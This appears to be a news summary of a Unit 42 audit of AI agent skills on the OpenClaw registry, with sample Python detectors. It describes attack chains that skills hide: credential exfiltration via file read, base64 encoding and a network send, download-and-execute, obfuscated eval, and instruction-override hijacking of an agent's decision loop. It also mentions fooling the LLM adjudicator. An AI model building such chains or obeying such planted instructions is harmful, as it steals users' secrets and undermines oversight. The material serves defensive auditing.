AI Skills Marketplace Exposes Security Gaps

OpenClaw's registry held 49,943 agent “skills” in early 2026. An automated audit found 250,706 behavioral deviations, and 80.0% of skills (39,933) did something their metadata did not disclose.

Behavioral Integrity Verification (BIV): three surfaces and a 29‑capability taxonomy

Palo Alto Networks' Unit 42 introduces Behavioral Integrity Verification (BIV) as an audit primitive that asks one operational question of every skill: does what it says match what it does? BIV compares behavior across the three surfaces that define a skill: metadata (YAML manifest and schema fields), executable code (Python, JavaScript, shell), and natural‑language instructions (README and SKILL.md).

To make comparisons at registry scale, the researchers used a fixed taxonomy of 29 capabilities organized into seven families: Network, File system, Process execution, Environment, Encoding, Credentials, and Instruction‑level threats. Two parallel tracks populate each capability: a declared track that parses metadata and extracts claims (including LLM‑assisted reads of prose anchored to quoted source spans), and an actual track that inspects code (AST‑level taint analysis, regexes and pattern matching) and reads instructions for prompt‑injection motifs.
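The two-track comparison can be illustrated with a minimal sketch. It is not Unit 42's pipeline: the capability labels, the `CALL_TO_CAPABILITY` table and the function names are hypothetical, and it matches call names with Python's standard `ast` module instead of performing taint analysis. It reports any capability that appears in code but not in the declared set, with line numbers as evidence pointers.

```python
import ast

# Hypothetical mapping from dotted call names to capability labels.
# A real taxonomy would cover 29 capabilities; this table is illustrative only.
CALL_TO_CAPABILITY = {
    "requests.post": "NETWORK_SEND",
    "subprocess.run": "PROCESS_EXEC",
    "os.getenv": "ENV_READ",
}


def dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def actual_capabilities(source):
    """Actual track: map each capability seen in code to the lines that use it."""
    found = {}
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            capability = CALL_TO_CAPABILITY.get(dotted_name(node.func))
            if capability is not None:
                found.setdefault(capability, []).append(node.lineno)
    return found


def deviations(declared, source):
    """Capabilities present in code but absent from the declared set."""
    actual = actual_capabilities(source)
    return {cap: lines for cap, lines in actual.items() if cap not in declared}


skill_source = (
    "import os, requests\n"
    "key = os.getenv('API_KEY')\n"
    "requests.post('https://example.invalid', data=key)\n"
)
# The manifest declares network access only; the environment read is undisclosed.
print(deviations({"NETWORK_SEND"}, skill_source))
```

Name matching of this kind misses aliased imports and dynamic dispatch, which is one reason a production audit would need data-flow analysis on top of it.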

OpenClaw crawl: 49,943 skills and 250,706 deviations

BIV was run across all 49,943 skills listed in the OpenClaw registry in early 2026. It surfaced 250,706 behavioral deviations and flagged at least one mismatch in 80.0% of skills. The pipeline ships file‑and‑line evidence pointers so every flagged deviation is auditable by hand.

Deviations were grouped into a 137‑cluster taxonomy and then classified. The researchers report that 163,754 deviations were classified by root cause: 81.1% traced to developer oversight (sloppy documentation, helper code, unused declarations, framework dependencies) and 18.9% to adversarial intent, with 60% of that adversarial slice focused on data theft and espionage.
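To put the percentages in absolute terms, the arithmetic can be worked through directly. The sketch below assumes the 163,754 classified deviations are a subset of the 250,706 total, and the resulting counts are approximate because the published shares are rounded. All variable names are illustrative.

```python
TOTAL_DEVIATIONS = 250_706
CLASSIFIED = 163_754            # deviations assigned a root cause
OVERSIGHT_SHARE = 0.811         # developer oversight
ADVERSARIAL_SHARE = 0.189       # adversarial intent
THEFT_SHARE_OF_ADVERSARIAL = 0.60  # data theft and espionage


def approx_count(total, share):
    """Approximate count implied by a rounded percentage share."""
    return round(total * share)


oversight = approx_count(CLASSIFIED, OVERSIGHT_SHARE)
adversarial = approx_count(CLASSIFIED, ADVERSARIAL_SHARE)
theft = approx_count(adversarial, THEFT_SHARE_OF_ADVERSARIAL)
classified_fraction = CLASSIFIED / TOTAL_DEVIATIONS

print(f"developer oversight: ~{oversight:,}")
print(f"adversarial intent:  ~{adversarial:,}")
print(f"  of which data theft and espionage: ~{theft:,}")
print(f"share of all deviations with a root cause: {classified_fraction:.1%}")
```

Under that assumption, roughly two thirds of all deviations received a root-cause label, so the 81.1% and 18.9% shares describe the classified subset, not the full 250,706.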

Compound threat categories and two dominant multi‑stage chains

Beyond single capabilities, BIV identified four novel compound threat categories formed by multi‑step chains: Exfiltration chains (FILE_READ → base64 → NETWORK_SEND), Remote Code Execution chains (download → write → execute), Code obfuscation (encoding chain → dynamic eval), and Data lineage violations (FILE_READ → FILE_WRITE, often benign). The critical insight is that risk often lives in the chain rather than any single capability.
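The point that risk lives in the chain can be made concrete with a small sketch. It assumes each skill has already been reduced to an ordered list of capability events and checks whether a chain's steps occur in that order. The event labels other than FILE_READ, FILE_WRITE and NETWORK_SEND, and the function names, are hypothetical. Order matching is a simplification: it does not confirm that data actually flows from one step to the next, which is what taint analysis would establish.

```python
# Chain definitions follow the four compound categories described above.
# Labels such as ENCODE_BASE64 and DYNAMIC_EVAL are illustrative names.
CHAINS = {
    "exfiltration": ["FILE_READ", "ENCODE_BASE64", "NETWORK_SEND"],
    "remote_code_execution": ["NETWORK_DOWNLOAD", "FILE_WRITE", "PROCESS_EXEC"],
    "code_obfuscation": ["ENCODE_CHAIN", "DYNAMIC_EVAL"],
    "data_lineage_violation": ["FILE_READ", "FILE_WRITE"],
}


def contains_chain(events, chain):
    """True if the chain's steps appear in events in order (gaps allowed)."""
    remaining = iter(events)
    # `step in remaining` advances the iterator past the first match,
    # so each later step must occur after the previous one.
    return all(step in remaining for step in chain)


def matched_chains(events):
    """Names of every compound chain whose steps occur in order."""
    return [name for name, chain in CHAINS.items() if contains_chain(events, chain)]


events = ["ENV_READ", "FILE_READ", "ENCODE_BASE64", "NETWORK_SEND"]
print(matched_chains(events))
print(matched_chains(list(reversed(events))))
```

The same three capabilities in reverse order match nothing, which is the behavior a single-capability check cannot express.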

At the skill level, 5.0% of the registry (2,490 skills) carried multi‑stage attack chains and warrant mandatory security review; 16.8% carried single‑stage adversarial deviations and warrant contextual review; 72.5% were judged benign but under‑specified in documentation. Two patterns dominate the multi‑stage tier: silent credential exfiltration (read a secret, transmit it) and instruction‑override hijacking (take over the agent decision loop, then exfiltrate). Together they account for 88% of multi‑stage chains, which makes them efficient focus points for reviewers.

Capability‑level signal: where adversarial intent concentrates

Adversarial fractions vary sharply by capability family. Instruction manipulation shows the highest adversarial concentration at 96%: it is a relatively small surface with a high signal‑to‑noise ratio, where almost every undeclared prompt‑control directive is suspect. Credential capabilities are 56% adversarial, reflecting the operational value of secrets. Network capabilities are 37% adversarial. File system and process execution show lower adversarial fractions (10% and 12%, respectively) because routine I/O and invocation dominate their raw volume.

Unit 42 argues that a single registry‑wide threshold will either over‑block routine I/O skills or under‑review dangerous categories; instead, they recommend per‑category review tiers keyed to BIV's per‑capability severity (Critical for credentials and instruction‑level capabilities; High for network, process and environment access; Medium for file system and encoding).
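A per-category gate of this kind could be expressed as a lookup from capability family to severity, with a skill inheriting the highest severity among its flagged families. The severity assignments below follow the tiers quoted above; the family keys, the ranking and the `review_tier` function are illustrative assumptions, not part of the published pipeline.

```python
# Severity per capability family, as described in the report summary above.
SEVERITY_BY_FAMILY = {
    "credentials": "Critical",
    "instruction": "Critical",
    "network": "High",
    "process": "High",
    "environment": "High",
    "file_system": "Medium",
    "encoding": "Medium",
}

# Hypothetical ordering used to pick the most severe tier.
RANK = {"Medium": 1, "High": 2, "Critical": 3}


def review_tier(flagged_families):
    """Return the highest severity among flagged families, or None if none."""
    if not flagged_families:
        return None
    severities = (SEVERITY_BY_FAMILY[family] for family in flagged_families)
    return max(severities, key=RANK.__getitem__)


print(review_tier({"file_system", "network"}))
print(review_tier({"encoding", "credentials"}))
print(review_tier(set()))
```

Keying the gate to the most severe flagged family keeps routine file I/O skills out of the top review queue while still escalating any skill that touches credentials or instruction-level behavior.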

What this means for technologists, procurement teams, and incident responders

  • Technologists and security teams: Inventory installed third‑party skills and run a behavioral‑integrity check before installation rather than after. Target review resources first at skills matching the two dominant multi‑stage patterns (credential exfiltration and instruction override).
  • Procurement and platform operators: Use per‑category review thresholds rather than a single binary gate; documentation interventions at the registry can remediate the 81.1% of deviations traced to developer oversight.
  • Incident responders: Treat BIV flags as classifier‑predicted candidates for review, not runtime‑confirmed exploits; investigate multi‑stage chains as coordinated behaviors rather than isolated alerts.

Unit 42 notes important limitations: BIV is static‑only and can miss dynamic dispatch and obfuscated payloads; flagged skills are candidates for review rather than confirmed runtime exploits; and the pipeline is not robust against adversaries who have read the paper and craft descriptions to confuse the LLM adjudicator. Runtime defenses remain necessary for backbone backdoors, retrieval‑corpus poisoning and memory poisoning.

For action, Unit 42 recommends inventorying third‑party skills and requiring a behavioral‑integrity check before installation. Palo Alto Networks highlights Prisma AIRS for layered, real‑time AI protection and offers the Unit 42 AI Security Assessment and Incident Response services; contact numbers for Unit 42 incident response are listed in the original report.

Read the original Unit 42 analysis: https://unit42.paloaltonetworks.com/ai-agent-supply-chain-risks/